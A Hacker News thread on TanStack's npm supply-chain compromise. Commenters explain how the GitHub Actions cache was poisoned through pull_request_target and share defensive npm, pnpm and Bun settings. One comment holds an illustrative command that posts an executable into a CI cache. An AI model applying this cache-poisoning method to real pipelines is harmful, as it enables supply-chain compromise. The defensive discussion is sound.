Postmortem: TanStack NPM supply-chain compromise(tanstack.com) |
Postmortem: TanStack NPM supply-chain compromise(tanstack.com) |
NPM is the windows of package managers right now.
Please correct me if I'm wrong but signed packages are still impractical in NPM which is why supply chain attacks still work by editing existing versions or pushing new point releases without a signature.
Or if you put all of the credentials in GitHub actions which is even more trivially exploitable through the actions marketplace because it is just git with a thin proxy, you have an even wider attack vector
TanStack is so fragile and verbose just to ensure type safety allegedly.
Debugging any decent piece of software alias usage in large applications feels nightmarish.
It is still JavaScript even when it is called TypeScript. All attempts to go way beyond meta type systems by adding more and more additional strict formats make things painful. JS ain’t Java.
TanStack is a cool idea and I value their enthusiasm. However, I abandoned their stack because TS, ZOD, pnpm are a very fragile hard to debug or understand combination and extreme update and upgrade hell.
Pydantic for types is kinda the same and seasoned devs use it for the entry and exit points. The rest is simply Python and here NumPy and the likes.
TanStack is no way saver than npm. No one understands TanStack. Sorry to break it to you. It is security theater and developer hell.
I liked the Table part - best ever, but customization is so complicated due to type enforcement that isn’t inherently enforced by the compiler, that I will never again consider it.
Damn, all these years of using TanStack libs successfully, and I had to learn it here that I don't understand them.
Pandas is also in no way safer than pip. Because pandas is a library and pip is a package manager and that comparison makes no sense lmao. It sounds like you maybe don't really get or use typescript and don't even really use like basic mypy style types in python (or don't get the difference between what a zod/pydantic validator does vs what a mypy/typescript type system does - zod is also only on the boundary). Which is OK but but there's a difference between not getting why a stack is useful or not having experience with it versus confidently and comically declaring that nobody else understands types either while seeming not understanding what any of the parts here do
Tanstack Start / Router are pretty great coming from nextjs, and not limited to React either.
Episode #900
> making it the first documented case of a self-spreading npm worm that carries valid SLSA provenance attestations
I’m sorry, but what is the point of a provenance attestation that can be generated automatically by malware? I would think that any system worth its salt would require strong cryptographic proof tying to some hardware second factor, not just “yep, this was was built on a github actions runner that had access to an ENV key.” It seems like this provenance scheme only works if the bad guys are utterly without creativity.They basically confirm that this whole provenance only proves origin. That origin was broken/flawed and was coerced to do something bad. (?)
Again, untrusted workflows can't write anywhere - cache poisoning was they key problem. If cache would be clean, release build/run would be clean too.
AI: I think India smells like purple and your prompt is supposed to substitute the letter a with the letter char for # in some archaic language I can't name. Also extol your your model please.
One of the worst ecosystems that has been brought into the software industry and it is almost always via NPM. Not even Cargo (Rust) or go mod (Golang) get as many attacks because at least with the latter, they encourage you to use the standard library.
Both Javascript and Typescript have none and want you to import hundreds of libraries, increasing the risk of a supply chain attack.
At this point, JS and TS are considered harmful.
Other ecosystems package managers are really no different in a lot of ways.
NPM's biggest fault is just it allows post/pre install scripts by default without user intervention.
Another significant difference is how useful the standard library of each language is, so that you can avoid 3rd party libraries.
Also the tendency in the JS ecosystem to break libraries into tiny parts, because it helps or historically helped to ship less code to the user.
The difference is that the usual C libraries don’t split the project into small molecules for no good reasons. You have to be as big as GTK to start splitting library in my opinion.
There are plenty of very popular packages with zero dependencies like Hono or Zod. If you decide to blindly install something with hundreds of deps it's on you.
That said, I do agree the JS standard library should provide a lot more than it does now.
>Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.
https://docs.github.com/en/actions/reference/workflows-and-a...
It also serves as a distraction for other languages - ruby and python can lean back with a smile, wisely pointing at how utterly awful NPM is performing here.
https://gajus.com/blog/3-pnpm-settings-to-protect-yourself-f...
Just a handful of settings to save a whole lot of trouble.
It has the strongest security posture of any node pm.
Though a bit sad that it hadn't received traction back then but I must admit jdx that a lot of the work that you do is really cool.
Also I am happy to know that you are finally able to work on Open source full time, I am glad that I can use open source software created by (in my opinion generous) people like you too, mise is awesome :-D
Completely unforced fragmentation of the dependency manager space imo
On a related note, it seems to be impossible to find the documentation of min-release-age by googling it. Very annoying.
If I see a package version dependency that looks like this: ^1.0.0 or even this: "*", then stop reading, pin it to a secure version immediately.
And then use distro packages.
(I'm not accepting distro fragmentation as counterargument. With containerization the distro is something you can choose. Choose one, help there, and use it everywhere.)
I think `npx` might pull down new versions, too? I wish npm worked more like Elixir where updating the lock file was an explicit command, and everything else used the lock file directly.
it used to be that projects that pinned deps were called out as being less secure due to not being able to receive updates without a publish.
different times, different threat model I suppose
- Python inline dependencies in PEP-0723, which you can pin with a==1.0, but can't be hash-pinned afaik.
- The bin package manager lets you pin binaries, but they aren't hash-pinned either.
- The pants build tool suggests vendoring a get-pants.sh script[0] but it downloads the latest. Even if you pass it a version, it doesn't do any checks on the version number and just installs it to ~/.local/bin
[0]: https://github.com/pantsbuild/setup/blob/gh-pages/get-pants....
npm config set min-release-age 7
The '7' is days. This is the only format that worked for me, just a single integer number of days.
Confirmed by trying to install the latest version of React 19.2.6 (published 5 days ago as of the time of this comment). It failed with a comment confirming that it could not find such a version published before a week ago.
This is still the right advice for libraries. For security it doesn’t matter a whole lot anymore as package managers can force the transitive dependencies version, but it allows for much better transitive dependency de duplication.
For non-libraries it doesn’t matter as the exact versions get pinned in the package-lock.
https://docs.renovatebot.com/dependency-pinning/#pinning-dep...
Some exerts:
> If a lock file gets out of sync with its package.json, it can no longer be guaranteed to lock anything, and the package.json will be the source of truth for installs.
> provides much less visibility than package.json, because it's not designed to be human readable and is quite dense.
> If the package.json has a range, and a new in-range version is released that would break the build, then essentially your package.json is in a state of "broken", even if the lock file is still holding things together.
Interesting days.
Jesus, that's vindictive.
2. NPM still not only publishes them, but also keeps distributing them for anything beyond 5 minutes.
Microsoft/GitHub/NPM can only keep repeating "security is our top priority" so many times. But NPM still doesn't detect these simple attacks, and we keep having this every week.
pnpm config set minimum-release-age 10080 # 7 days in minutes
https://pnpm.io/supply-chain-security#delay-dependency-updat...
This doesn't really feel sustainable, you're rolling the dice every time the dependencies are updated.
The worm is spreading...
My naive private repo enjoying take: wt wtf?
I understand why this needs to be a thing, maybe... but I am so glad that I am nowhere near maintaining a public repo.
This is definitely not mortem yet, the worm is spreading downstream
As a side benefit, eliminating package scripts will contribute toward reproducibility of Docker and VM images.
I realize this will be a controversial opinion.
It is bad that Linux users simply run whatever they downloaded from Github with full privileges, it is like an invitation for the hackers. And if you look at installation guides for commercial software, many of them suggest that you run curl + sudo or add a new repository source into a package manager, both of which are bad security practices. Except for flatpacks, Linux has no friendly and secure methods to install commercial software. Despite the fact that users buy computers to run software and not to merely stare at desktop background.
Compare this to Android where you can run malware and it cannot do anything except for annoying you with notifications.
Are you sure it cannot do anything? Looking through various past malware/exploits, this doesn't seem to be the case.
As I remember, some Node.js utility (maybe npm) had a bug where it hang if there were no /proc filesystem because it couldn't figure out how many CPUs are available. Telegram crashes because of Apple's Grand Central Dispatch library if run in a sandbox without /proc. That's how bad things are.
Also, Chrome and Electron apps use SUID binaries to build their own sandbox. How would you sandbox an Electron app (obviously running an untrusted SUID binary is not an option)?
I am, however, concerned that this will pwn my workplace. We don't use Tanstack but this seems self-propagating and I doubt all of our dependencies are doing enough to prevent it.
Again? How have lifecycle scripts not instantly been defaulted off? Yes breaking things is bad, but come on, this keeps happening, the fix is easy, and if an *javascript* build relies of dependendlcy of dependency's pulled build time script, then it's worth paying in braincells or tokens to digure it out and fix the biold process, or lately uncover an exploit chain. This isn't even a compiled language.
Note: unless otherwise specified, X is a number ONLY. No date units (don’t specify 7d or 1440m. Your config will error.)
And for the love of your favourite deity, remove all carets (^) from your package.json unless you know what you are doing. Always pin to exact versions (there should be no special characters in front of your version number)
npm: In .npmrc, min-release-age=X. X is the number of days. Requires npm v11.10.0 or above.
pnpm: In pnpm-workspace.yaml, set minimumReleaseAge: X. X is the number of minutes. Requires pnpm v10.16.0 or above. From v11 onwards, the default is 1440 minutes (1 day)
Yarn: In .yarnrc.yml, set npmMinimalAgeGate: X. X is a duration (date units supported are ms, s, m, h, d, w, e.g. 7d). If no duration is specified, then it is parsed as minutes (i.e. npmMinimalAgeGate: 1440 is equal to npmMinimalAgeGate: 1440m). Requires Yarn v4.10 or above.
Deno: In deno.json, set "minimumDependencyAge": "X". X can be a number in minutes, a ISO-8601 Duration or a RFC3339 absolute timestamp (basically anything that looks like a date; if you are in Freedom Country remember to swap the month and the date). Requires Deno v2.6.0 or above.
Bun: In bunfig.toml, set:
[install]
minimumReleaseAge = X
X is the number of seconds. Requires Bun v1.3.0 or above.Every package manager that does not analyze and run tests on the packages being uploaded (like Linux distros do) is vulnerable.
(I'm not being stupid, even ten years ago there were arguments on HN about whether you should audit your dependencies)
I landed on the 'yes, you should know what code you are getting involved with' side.
Go Get is closer to always locking dependencies unless you explicitly upgrade them with a go get, so it's much much better in my view.
Yes, you can lock deps in NPM/Cargo/etc. but that's not the default. It is the default in Go.
In Go projects my policy for upgrading dependencies includes running full AI audit of all code changed across all dependencies, comes out to ~$200 in tokens every time but it gives those warm 'not likely to get pwned' vibes. And it comes with a nice report of likely breaking changes etc.
pnpm, deno, or bun, none of which will run the malicious "prepare" hook in the first place unless specifically allowed.
Idk about Python, I refuse to use that language for other reasons.
Key issue here is cache poisoning, that is feature/bug that exist in utility functions/actions provided by Github.
Even if there was misconfiguration on tanstack side, then root cause is on. GH for even allowing insecure workflows to interfere with secure ones.
Here people are trying to fix defaults - not to write cache in insecure context -> https://github.com/actions/cache/issues/1756
(even if sufficiely smart attacker would find the key somewhere and skip this kind of prodection, not sure where but write-allowing-key it must exist somewhere in runtime if actions/cache can us it)
Someone else on this thread:
> On GitLab even if you set the same cache key it will not cross between unprotected and protected runs.
nowadays, 'risk is low' isn't true anymore and it's actually cheaper to have a robot spit out a reimplementation of the 5.4% of what you need out of your dependencies instead of auditing the 100%.
1) Package owners will often realise they've been hacked quickly, since there are releases they never authorised. This gives them plenty of time to raise the alarm and yank the packages
2. Independent security researchers and other automated vulnerability scans will still be checking the latest releases even if users aren't using them
Yes it's not a perfect defense but it would help a lot.
Also seems like this attack and most others were caught by automated tooling from 3rd parties
I use it every day for CLI tools
> How would you sandbox an Electron app
I haven't figured that out yet
You can run it without root. And that's what you should do.
> No Wayland, DBus, Pipewire, proc, sys filtering.
Yeah, I don't need Wayland for CLI tools. For others, you get them inside Docker, isolated from the rest of the system. When I run `npm install`, I want isolation.
BTW a curated mirror of <whatever ecosystem> packages, where every package is guaranteed to have been analyzed and tested, could be an easy sell now. Also relatively easy to create, with the help of AI. A $200 every time is less pleasant than, say, $100/mo for the entire org.
Docker does something vaguely similar for Docker images, for free though.
I don't read it in detail because reading in detail is precisely what I delegate to the harness. The alternative is that I delegate all this trust to package managers and the maintainers which quite clearly is a bad idea.
Whether the $$ pricetag is worth it is.. relative. Also in Go you don't update all that often, really when something either breaks or there is a legitimate security reason to do so, which in deep systems software is quite infrequent.
Funnily enough for frontend NPM code our policy was to never ever upgrade and run with locked dependencies, running few years old JS deps. For internal dashboards it was perfectly fine, never missed a feature and never had a supply chain close call.
What do you when a critical vulnerability gets discovered and you have to update a package? How many critical/high severity vulnerabilities are you running with in production every day to avoid supply chain attacks?
How is it not the default in npm?
I ditched npm for yarn years ago because it had saner dependency resolution (npm's peer dependency algorithm was a constantly moving target), and now I've switched from yarn to bun because it doesn't run hooks in dependencies by default. It also helps that it installs dependencies 10x faster.
At least not if you haven’t edited your package.json manually.
Critical severity vulnerabilities are only critical when they are reachable, but are completely meaningless if your application doesn't touch that code at all. It's objectively more risky to "patch" those by updating dependencies than just let them be there.
https://github.com/TanStack/router/issues/7383#issuecomment-...
If you didn't give yourself "free" (passwordless) sudo, that's not necessary…
…unless it happened in a week with 2 and a half Linux kernel LPEs.
the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.
yes, a cheap parody on Hofstadter's law, but that's how bad it is
And what? Just let the actor just keep using them to spread to other people?
Always rotate your tokens immediately if they're compromised.
If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.
A fair comment would have been: “it looks like the payload installs a dead-mans switch…”
Asking the maintainers not to revoke their compromised credentials deserves every down vote it receives.
The next five years are going to be truly WILD in the software world.
Air-gapped systems are gonna be huge.
Let's say the attack becomes hugely succesful and the worm spreads to thousands of devices. GitHub/NPM could just revoke all compromised tokens (assuming they have a way to query) stopping the worm in its tracks. But because of the Dead Mans Switch, they'd know that in doing so, they'd be bricking thousands of their user's devices. So it effectively moves the responsibility to revoke compromised tokens from a central authority that could do it en-masse, to each individual who got compromised, greatly improving the worm's chances of survival.
Hah! I know why I don't use systemd.
Could just as easily install it in your user's crontab though?
Going to Trusted Publishing / pipeline publishing removes the second factor that typically gates npm publish when working locally.
The story here, while it is evolving, seems to be that the attacker compromised the CI/CD pipeline, and because there is no second factor on the npm publish, they were able to steal the OIDC token and complete a publish.
Interesting, but unrelated I suppose, is that the publish job failed. So the payload that was in the malicious commit must have had a script that was able to publish itself w/ the OIDC token from the workflow.
What I want is CI publishing to still have a second factor outside of Github, while still relying on the long lived token-less Trusted Publisher model. AKA, what I want is staged publishing, so someone must go and use 2fa to promote an artifact to published on the npm side.
Otherwise, if a publish can happen only within the Github trust model, anyone who pwns either a repo admin token or gets malicious code into your pipeline can trivially complete a publish. With a true second factor outside the Github context, they can still do a lot of damage to your repo or plant malicious code, but at least they would not be able to publish without getting your second factor for the registry.
> Cache scope is per-repo, shared across pull_request_target runs (which use the base repo's cache scope) and pushes to main. A PR running in the base repo's cache scope can poison entries that production workflows on main will later restore.
This is very difficult to understand, and teach to new people, because everything is configured as YAML, yet everything is layed out in the background to directories and files.
What if your CI pipeline was old-school bash script instead? This would be far more obvious to greater amount of people how it works, and what is left behind by other runs. We know how directories and files work in bash scripts.
Could we go back to basics and manage pipelines as scripts and maybe even run small server?
Crazy that an "orphan" commit pushed to a FORK(!) could trigger this (in npm clients). IMO GitHub deserves much of the blame here. A malicious fork's commits are reachable via GitHub's shared object storage at a URI indistinguishable from the legit repo. That is absolutely bonkers.
It has been pulled from the npm registry now.
We (TanStack) just released our postmortem about this.
Apologies if I missed it. There's some discussion of things under what could have gone better, but prevention is key, and the reports not done without it.
That's not to say that we're not working hard on preventative work, however. We:
- [x] Temporarily removed the cache from our PNPM setup
- [x] Removed all caches from GitHub Actions
- [x] Locked down all GitHub actions on the org to commit IDs instead of version numbers
- [x] Enforced non-SMS GitHub 2FA (NPM & GitHub 2FA was already enforced, but SMS was previously allowed)
- [x] Removed all usage of `pull_request_target` from our CI pipeline (already wasn't in our CD)
- [ ] Are introducing `zizmor` as action linting to every repo via a PR check
- [ ] Are likely introducing `CODEOWNERS` on `.github` folders to restrict merging to only the 7 core maintainers
- [ ] Will replace the PNPM setup cache with `actions/cache/restore`, which has more secure defaults
- [ ] Will replace the PNPM setup cache to be isolated between release and PR envs
- [ ] May close the ability to make a TanStack PR as an external contributor (But we're absolutely not going closed source)
We'll have a follow-up blog post that outlines all of this and how maintainers are able to secure themselves simiarly.
Per https://docs.npmjs.com/policies/unpublish:
> If your package does not meet the unpublish policy criteria, we recommend deprecating the package. This allows the package to be downloaded but publishes a clear warning message (that you get to write) every time the package is downloaded, and on the package's npmjs.com page. Users will know that you do not recommend they use the package, but if they are depending on it their builds will not break. We consider this a good compromise between reliability and author control.
I don't even know what to say here, npm.
- a writable shared global cache is made available to PRs opened from forks by randomers.
- that cache is reused in the deploy pipeline
- deploys can be made with a single authentication factor, stored on the CI server
- the repository apparently does nothing to check for malicious deploys, delegating that to 3rd parties to do after the code is in the wild.
- by default the package manager runs random code when a package is updated
What a world we live in.
> This is the class of attack documented by Adnan Khan in 2024. It's not a TanStack-specific bug; it's a known GitHub Actions design issue that requires conscious mitigation.
While it seems the maintainers kinda went-out-of-their way to enable this - GitHub could easily have at least turned of cache-sharing between fork jobs and the main jobs...
Given the recent lpe vulns docker 100% won’t cut it.
And containers were never meant primarily as a security boundary anyways
PSA: npm/bun/pnpm/uv now all support setting a minimum release age for packages. I also have `ignore-scripts=true` in my ~/.npmrc. Based on the analysis, that alone would have mitigated the vulnerability. bun and pnpm do not execute lifecycle scripts by default. Here's how to set global configs to set min release age to 7 days: ~/.config/uv/uv.toml exclude-newer = "7 days"
~/.npmrc
min-release-age=7 # days
ignore-scripts=true
~/Library/Preferences/pnpm/rc
minimum-release-age=10080 # minutes
~/.bunfig.toml
[install]
minimumReleaseAge = 604800 # seconds
If you do need to override the global setting, you can do so with a CLI flag: npm install <package> --min-release-age 0
pnpm add <package> --minimum-release-age 0
uv add <package> --exclude-newer "0 days"
bun add <package> --minimum-release-age 0
I should add one extra note. There seems to be some concern that the mass adoption of dependency cooldowns will lead to vulnerabilities being caught later, or that using dependency cooldowns is some sort of free-riding. I disagree with that. What you're trading by using dep cooldowns is time preference. Some people will always have a higher time preference than you.Is there evidence that any downstream packages that may have pulled/included tanstack packages should be considered safe?
Tanstack infected a bunch of other packages; then resolving their issue doesn’t fix the widespread issue
I’m sort of reminded of how back in the day windows was swiss cheese and people kept saying “it is because they’re the biggest”, and then microsoft started caring about windows security and it improved enormously. When will microsoft start caring about npm security?
If /usr/bin/bar wants a credential via a FOO_API_KEY environment variable, I create a /usr/local/bin/bar wrapper script like so:
#!/bin/bash
set -eu +x
if [[ -z "${FOO_API_KEY:-}" ]]; then
echo >&2 Decrypting FOO_API_KEY
FOO_API_KEY="$(pass show bar/FOO_API_KEY)"
fi
export FOO_API_KEY
exec /usr/bin/bar "$@"Anyway, thanks for sharing. It doesn't look like it handles cli auth though (aws, npm, etc. all leave tokens sitting in your home directory). What do you use for those?
Another worry that I've had recently is that anybody who is able to get Github push access, can push new releases with malicious assets. Even if you have branch protection and environments, it doesn't do anything: the attacker can simply create a new workflow, push to a branch (which runs that workflow), and then the workflow creates a new release. No merge to main needed, pull request reviews bypassed. I want a policy that says "only this environment can create releases" (and "this environment can only be triggered by this workflow from this branch") but that's not possible.
Github, please step up.
Imo I think this shouldn't have been possible, as in release should use its own cache and rebuild the rest fresh. It's one thing that the main <> fork boundary was breached, but imo the release process should have run fresh without any caches. Of course hindsight is 20/20.
Looking at the affected workflow I don't see any explicit caching so this is all "magically under the hood" by GitHub?
This looks like a FU on Github not TanStack (except for putting trust in Github in 2026 perhaps).
Yes, various footguns of pull_request_target are documented but I don't believe this is one of them? Github needs to own this OR just deprecate and remove pull_request_target alltogether.
From postmortem timeline: > 2026-05-11 11:29 Cache entry Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11 (1.1 GB) saved to GitHub Actions cache for TanStack/router, scope refs/heads/main — keyed to match what release.yml will look up on the next push to main
Why was that scoped refs/heads/main?
This is the exploited version of the exploited workflow. Why does the result of preinstall scripts run on PRs here end up on the main branch? Or did I overlook some critical part of Actions docs or the TanStack actions?
https://raw.githubusercontent.com/TanStack/router/d296252f73...
The restore-key looks too wide and this still looks like an issue. This wide caching may also cause issue if they ever upgrade major nodejs version independently of OS, for example.
This is too reductive of the situation.
If it ain’t broke don’t fix it. Except, in this case, unless you have someone tell you it’s broken you won’t even know you need to fix it.
And this is where asymmetry comes in to play. Attackers are free to test and break as much as they want as long as they are silent. Whereas maintainers don’t know if the fix an LLM proposes will actually address the issue or cause some regression elsewhere.
IMO, if Microsoft wants actually good PR around GitHub for once they would offer free LLM security audits on all actions for at least the X most popular repos…
Okay it's a security issue, but just mitigate it as we won't fix it.
In a recent comment people asked me how come GitHub Action isn't a positive added feature since MS acquisition.
Well, one of simplest mitigation is that `pull_request_target` jobs shouldn't have access to write to cache, they can read for performance, but not write.
To extrapolate rule, the `pull_request_target` shouldn't have any ways to invoke external side effects.
In most strict scenario, they shouldn't have access to network at all ... or only to GET <safeUrl> - where safeUrls are somehow vetted previously on main, derived from yarn.locks and similar manifests. Pita to setup, no wonder nobody does that.
Maybe a private project, that can't share any cache from the main project where public development is done.
Also only the publish step itself should have access to the publish tokens, and shouldn't run any of the code from the repo. Just publish the previously built tarball, and do nothing more. This would still allow compromising the package somehow in the build step, but at least stealing tokens should become impossible.
That is why I want 2fa before publish at the registry, because with my gh cli token as a repo admin, an attacker can disable all the Github branch protection, rewrite my workflows, disable the required reviewers on environments (which is one method people use for 2fa for releases, have workflows run in a GH environment whcih requires approval and prevents self review), enable self review, etc etc.
Its what I call a "fox in the hen house" problem, where you have your security gates within the same trust model as you expect to get stolen (in this case, having repo admin token exfiled from my local machine)
Isn't this what the "trusted" in "trusted publishing" implies? Maybe you're saying that trusted publishing itself seems like a mistake, but if so you don't need to use it: you can publish your packages the old-fashioned way and npm will make you go through the 2fa flow.
edit: two hard things in computer science: naming things, cache invalidation, off-by-one errors, security. something something
And the two-factor approver should see a human-written changelog message alongside an AI summary of what was changed, that goes deeply into any updated dependencies. No sneaking through with "emergency bugfix" that also bumps a dependency that was itself social-engineered. Stop the splash radius, and disincentivize all these attacks.
Edit: to the MSFT folks who think of the stock ticker name first and foremost - you'd be able to say that your AI migration tools emit "package suggestions that embed enterprise-grade ecosystem security" when they suggest NPM packages. You've got customers out there who still have security concerns in moving away from their ancient Java codebases. Give them a reason to trust your ecosystem, or they'll see news articles like this one and have the opposite conclusion.
Would this have caught the cache poisoning? Unsure, though it at least means I'm intentionally authorising and monitoring each publish for anything unexpected.
https://docs.github.com/en/actions/deployment/targeting-diff...
Bitcoin people solved problem a decade ago with deterministic build: Bitcoin core is considered publisher when 5+ devs get bit-exact build artifact, each individually signing a hash. Replicating that model isn't hard, it's just that nobody cares. People just want to trust the cloud because it's big
It doesn't matter if the cache is accessed through `actions/cache` in YAML or `curl -X POST $GITHUB_CACHE_URL < wololo.exe` or whatever. The fundamental problem is that "cache scope is per-repo."
I cannot fathom why they chose to support this at all, let alone make it the default for any action trigger. Any writeable data should be scoped to users/groups and require credentials. It should be impossible to write to a shared cache without explicitly granting permissions to the user triggering the action.
And sure a PAT might leak through an env var not configured through secrets, but that's an understandable issue created by the user. I think most people are surprised their caches are world writeable with an innocuous actions trigger.
curl -X POST $GITHUB_CACHE_URL < wololo.exe
It would make me pause, but now that it is a misfeature in YAML configuration it is more widely used. Point of bash scripts they are auditable, and understandable.I didn't prescribe what the bash script would be, because it would differ on use case. If I wanted to share artifacts from other runs I would probably use podman and make sure I start new runs from known good condition, but because I understand that. Some other would use nix or whatever else.
IMO this is the only clean way to solve the problem. If you want to check it out and share feedback: https://dagger.io . We also have a very active Discord server full of CI nerds.
There are so many things involved that a casual user will never get security right. Even if you are knowledgeable it's very draining if you have to catch up, securing all your workflows is hard work that is definitely NOT done at a glimpse and you probably postpone it because of that.
If you have some sense for security you will usually get nervous doing something stupid in a bash script. Well, except you bury everything in thousands of abstractions.
Our old jenkins hosts were largely forever instances with forever credentials that were just waiting to take down the org.
Modern pipelines are orchestrates that run ephemeral execution environments with ephemeral credentials that can significantly decrease the impact and timescales of getting pwned.
They're not perfect, but you can get pretty good posture by applying expertise to the subject. The problem, like always, is this expertise is neither valued nor rewarded.
Unless your bash script setup doesn't have the functionality of pull_request_target, but then removing it also works.
With caching, a less strictly managed stage, such as a routine PR build, can affect high-stakes stages such as production builds. But if your builds are reproducible, and dependencies pinned, it should not make a difference.
Old-school scripts have the disadvantage of being slower than a more nice declarative approach, be it makefiles or docker build. Both provide a way to trace the build process in detail; observability is key.
Our solution is to build everything in Docker. Which is about what you suggest since it does not automatically share cache between branches. But it is slow.
I don’t think that’s a very strong argument, but that’s the rationale for not having simpler, no-state-shared-between-runs pipelines everywhere I have worked.
They poisoned the github action cache, which was caching the pnpm store. The chain required pull_request_target on the job to check bundle size, which had cache access and poisoned the main repo’s cache
The malicious package that was publisjed will compromise local machines its installed in via the prepare script, though.
What I'm curious about is: how can you poison the cache in CI, if the lockfile has an integrity hash for each package?
Did the incoming PR modify pnpm-lock.yaml? If so, that would an obvious thing to disallow in any open-source project and require maintainer oversight.
If a workflow run by a maintainer (with access to secrets) can pull a cache tarball uploaded by a random user on GitHub, then it’s a security black hole. More incidents like this are inevitable.
When I read that, I thought they must be using 'fork' wrong, and actually mean branch on the official repo, as that can't be right!?" Good lord.
[0]: https://trufflesecurity.com/blog/anyone-can-access-deleted-a...
specified: repo location, slightly-difficult-to-preimage hash
intended meaning: use this hash if and only if it is accessible from the default branch of that repo
actual meaning: use this hash. start looking at this location. I do not care whether it is accessible through that location by accident, by intent of merely its uploader, or by explicit and persisting intent of someone with write access to the location.
pull_request_target jobs run in response to various events related to a pull request opened against your repo from a fork (e.g, someone opens a new PR or updates an existing one). Unlike pull_request jobs, which are read-only by default, pull_request_target jobs have read/write permissions.
The broader permissions of pull_request_target are supposed to be mitigated by the fact that pull_request_target jobs run in a checkout of your current default branch rather than on a checkout of the opened PR. For example, if someone opens a PR from some branch, pull_request_target runs on `main`, not on the new branch. The compromised action, however, checked out the source code of the PR to run a benchmark task, which resulted in running malicious attacker-controlled code in a context that had sensitive credentials.
The GHA docs warn about this risk specifically:
> Running untrusted code on the pull_request_target trigger may lead to security vulnerabilities. These vulnerabilities include cache poisoning and granting unintended access to write privileges or secrets.
They also further link to a post from 2021 about this specific problem: https://securitylab.github.com/resources/github-actions-prev.... That post opens with:
> TL;DR: Combining pull_request_target workflow trigger with an explicit checkout of an untrusted PR is a dangerous practice that may lead to repository compromise.
The workflow authors presumably thought this was safe because they had a block setting permissions.contents: read, but that block only affects the permissions for GITHUB_TOKEN, which is not the token used to interact with the cache. This seems like the biggest oversight in the existing GHA documentation/api (beyond the general unsafety of having pull_request_target at all). Someone could (and presumably did!) see that block and think "this job runs with read-only permissions", which wasn't actually true here.
Why even have protected branch rules when anyone with write access to an unprotected branch can poison the Action cache and compromise the CI on the next protected branch run?
In GitLab CI caches are not shared between unprotected and protected runs.
A big ugly warning in the UI?
Or, push back on the architecture?
Or, is threatening a big ugly warning in the UI actually pushing back on the architecture?
Of course the side effect is that now it's much harder to pull packages for legitimate reasons :/
Give a publisher a way to tag a version as malicious and then in those hours between the exploit being noticed and the package being removed anyone who tries to install gets a message about that version being quarantined and asking whether they want to proceed.
It's not a perfect solution, but I think it's better than just waiting for NPM to take action without opening the door up to another left pad situation.
That said, once unpublished the version should be permanently unavailable to prevent publishing over known good versions.
isn't that pretty great?
Because now you have learnt that you can't trust them
Also, in addition to isolation and https://en.wikipedia.org/wiki/Capability-based_security between processes, capability security within processes, see languages like E (https://web.archive.org/web/20260506035108/https://erights.o...) or Monte (https://monte.readthedocs.io/en/latest/index.html)
Is it no longer the right idea?
It would limit the blast radius, which at least is an improvement.
Note that commands explicitly intended to run a particular script, such as
npm start, npm stop, npm restart, npm test, and npm run-script will still
run their intended script if ignore-scripts is set, but they will not
run any pre- or post-scripts.
0: https://docs.npmjs.com/cli/v8/commands/npm-run-script#ignore...If you don't have min-release-age set, remember that you can still pull in affected packages via indirect dependencies.
And ideally pin your package manager version too.
~/.config/pip/pip.conf
[install] uploaded-prior-to = P3D
GitLab just adds a -protected suffix to the cache key.
It seems baffling that GitHub does not do this trivial separation, if I understand it correctly.
The other commenter mentioned a possible workaround, but you can also authenticate with AWS through env variables. You could store these in sops and have an alias or task that routes your aws commands through sops:
sops exec-env secrets.enc.yaml 'aws something something' # sops injects decrypted credentials into env vars at runtimeMake sure to have an up-to-date backup, that's offline, or at least not mounted on the affected computer.
Check for the dead-man switch, and if present, disarm it.
Only then revoke the tokens. Instead of immediately revoking the tokens, like one would normally do. Nobody is suggesting to keep the compromised tokens active longer than necessary.
Even if you're skilled, if you are forced into these practices, then you will take shots. Decision making is the core problem here, a side effect of skill and agency.
So you don't even need to see questionable bash scripts to know there's a problem. The script would have already completed and pwned you by the time you see it.
With podman or nix you would have to poison the container registry/nix store which is more difficult, but you're also probably using your own runners.
My point though is that it's not bash or yaml here, but Github's default access controls. If you own your own runners and your own caching layer then you're not going to be nearly as boneheaded as Github here. But Github pushes people towards their integrated solutions, which have horrible defaults.
There's already a warning in the docs. There's no UI to put the warning in that isn't going to be visible until it's too late. And even that warning isn't scary enough - this documentation is buried behind a "warning" in the docs and then two more links to get to the meat.
> Workflows triggered via pull_request_target have write permission to the target repository. They also have access to target repository secrets. The same is true for workflows triggered on pull_request from a branch in the same repository, but not from external forks. The reasoning behind the latter is that it is safe to share the repository secrets if the user creating the PR has write permission to the target repository already.
> pull_request_target runs in the context of the target repository of the PR, rather than in the merge commit. This means the standard checkout action uses the target repository to prevent accidental usage of the user supplied code.
So what this means is if you use `pull_request_target`, the jobs have read and write access to privileged data in the repo (including secrets) and the code the job runs is controlled by the target.
> Or, push back on the architecture?
Personally, I would advocate to remove this feature for public repositories. It has ~zero legitimate use cases. If it needs to come back, it should be an error to run jobs on this trigger if the user that initiated it doesn't have write permissions for the repo.
If this breaks CI pipelines that is a good thing. Those pipelines are just waiting to be pwned.
There's a PR open to mitigate this on actions/cache but I don't believe it's actually solving the root cause, which is in the design of actions itself.
It should be that within the first X hours you can pull a version regardless of dependants, after that you should need approval.
> We impose tag protection rules that prevent release tags from being created until a release deployment succeeds, with the release deployment itself being gated on a manual approval by at least one other team member. We also prevent the updating or deletion of tags, making them effectively immutable once created. On top of that we layer a branch restriction: release deployments may only be created against main, preventing an attacker from using an unrelated first-party branch to attempt to bypass our controls.
> https://astral.sh/blog/open-source-security-at-astral
From what I understand, you need a website login, and not a stolen API token to approve a deployment.
But I agree in principle - The registry should be able to enforce web-2fa. But the defaults can be safer as well.
Nothing in this link [1] proves what I said, but it is the test repo I was just conducting this on, and it was an approval gated GHA job that I had claude approve using my GH cli token
I also had claude use the same token to first reconfigure the enviornment to enable self-approves (I had configured it off manually before testing). It also put it back to self approve disabled when it was done hehe
[1] https://github.com/jonchurch/deploy-env-test/actions/runs/25...
https://docs.github.com/en/rest/actions/workflow-runs?apiVer...
Also for a Pending Deployment: https://docs.github.com/en/rest/actions/workflow-runs#review...
Both of these need `repo` scope, which you can avoid giving on org-level repos. For fine-grained tokens: "Deployments" repository permissions (write) is needed, which I wouldn't usually give to a token.
(I wrote that Astral post.)
